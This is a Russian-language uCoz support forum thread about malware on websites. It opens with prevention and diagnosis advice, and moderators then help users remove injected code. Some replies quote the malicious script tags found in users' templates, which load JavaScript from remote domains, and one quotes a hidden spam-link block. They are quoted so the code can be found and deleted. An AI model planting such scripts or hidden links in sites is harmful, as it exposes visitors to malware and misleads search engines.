Вирусы на сайтах
|
|
Сообщение # 1 |
22:08:04
21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт - Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.
- Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.
- В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса
- Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.
- Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.
Диагностика - Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров - Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
- Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте - Вы должны предоставить ссылку на сайт!
- Вы должны дать описание проблемы:
1) на какой странице сайта обнаруживается проблема (ссылка)
2) проблема обнаруживается только под логином или под гостем тоже
3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки
4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
Сообщение от Модератор форума
|
silovik962
Сообщений: 5
Сообщение # 616 |
10:11:22
25 Сен 2013
помогите мне пожалуйста выходит вот такая картинка при заходе на свой сайт
|
webanet
Сообщений: 24067
Сообщение # 617 |
12:49:50
25 Сен 2013
silovik962, надо читать 5 раз правила подачи заявки и давать адрес сайта, а не просто картинки вешать на сайт с музыкой
панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляем скрипт
Код <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script> поле на что заменить оставить пустым и произвести замену во всех модулях
далее ищем сами картинки или ссылки на сайте с адресом wot-fansite.ru
обязательно меняем пароль uid профиля. инструкция тут //forum.ucoz.ru/forum/45-52299-1
|
silovik962
Сообщений: 5
Сообщение # 618 |
12:59:04
25 Сен 2013
webanet, все сделал как вы сказали множите все перепроверить заранее спасибо
|
webanet
Сообщений: 24067
Сообщение # 619 |
13:00:47
25 Сен 2013
silovik962, нет. перепроверять не буду. слушайте сами свою музыку на полной громкости. не забудьте найти и удалить ссылки сайта который указал гугл
|
silovik962
Сообщений: 5
Сообщение # 620 |
13:03:20
25 Сен 2013
webanet, извините за музыку я все удалил как вы сказали , мне это очень важно пожалуйста проверьте прошу вас.
|
webanet
Сообщений: 24067
Сообщение # 621 |
13:14:16
25 Сен 2013
все нормально. кроме спама в шаблоне нижняя часть сайта чисто вот спам
Код <div style="display:none;"><a href="http://mysoft-world.ru/load/ucoz/igrovye_shablony/31">Игровые Шаблоны для ucoz</a></div> и в таблице стилей у вас тьма картинок с сайта stalker-planet.org.ru и все битые
|
silovik962
Сообщений: 5
Сообщение # 622 |
13:16:35
25 Сен 2013
webanet , спасибо вам за понимания , я так понимаю мне нужно это просто удалить???
|
webanet
Сообщений: 24067
Сообщение # 623 |
13:19:34
25 Сен 2013
silovik962, да. удалить и ждать перепроверки гуглом, если ещё блочит
|
silovik962
Сообщений: 5
Сообщение # 624 |
13:20:17
25 Сен 2013
|
BUB
Сообщений: 39
Сообщение # 625 |
15:37:00
25 Сен 2013
Цитата (webanet) или снимайте на основном счетчик. потому что там ссылка на старый домен. хотя бы временно пока не утрясется. потому что из-за этого старого домена под блоком прикрепленный так и будет мигать в гугле то заблоченный то нет благодарю за помощь подскажите, как убрать счётчик у donbass-scooter.clan.su и оставить только на привязанном домене dcc-dsc.su? зашёл в настройки счётчика статистики, прикреплён для учётка только основной dcc-dsc.su домен
|
webanet
Сообщений: 24067
Сообщение # 626 |
15:51:41
25 Сен 2013
BUB, в том то и дело что никак не снять картинку счетчика со стандартным доменом. во всяком случае я не знаю как. поэтому временно снимите счетчик. просто счетчик. не надо удалять модуль статистики просто код счетчика из шаблонов изымите. сделайте бекап шаблонов - изымите счетчик - потом как гугл отпустит старый домен одним движением руки вернете
|
BUB
Сообщений: 39
Сообщение # 627 |
16:15:28
25 Сен 2013
скрыл в настройках счётчик благодарю за помощь.
|
IIpoI00
Сообщений: 10
Сообщение # 628 |
16:59:30
25 Сен 2013
привет ребят) как удалить с моего сайта вирус (ы)? скрин:
Это только один, там ещё есть пару штук!!!Добавлено (25 Сен 2013, 16:59:30) ---------------------------------------------
Цитата (IIpoI00) Это только один, там ещё есть пару штук!!! Извиняюсь мой сайт!
|
сondor
Сообщений: 4661
Сообщение # 629 |
18:57:53
25 Сен 2013
IIpoI00, ищем в шаблонах скрипт:
Код <script language="javascript" src="http://uno.wt-rotator105.ru/?t=cf&noadult=1&pid=37303"></script>
И удаляем его. Можно через быструю замену. Панель Управления - Дизайн - Быстрая замена участков шаблона. Режим замены: простой В поле где Что заменить: вставляем скрипт Поле На что заменить оставляем пустым
IIpoI00, забудьте вообще про онлайн сервисы проверок на вирусы, так как они не точно определяют, а точнее даже совсем неверно...
Сообщение отредактировал condor-bird - Среда, 25 Сен 2013, 19:00:19
|
IIpoI00
Сообщений: 10
Сообщение # 630 |
06:16:48
26 Сен 2013
Цитата (condor-bird) И удаляем его. Можно через быструю замену.Панель Управления - Дизайн - Быстрая замена участков шаблона. Режим замены: простой В поле где Что заменить: вставляем скрипт Поле На что заменить оставляем пустым Спасибо огромное вам, а как вы определили, что это именно этот скрипт? Я тоже хочу научится этому.
|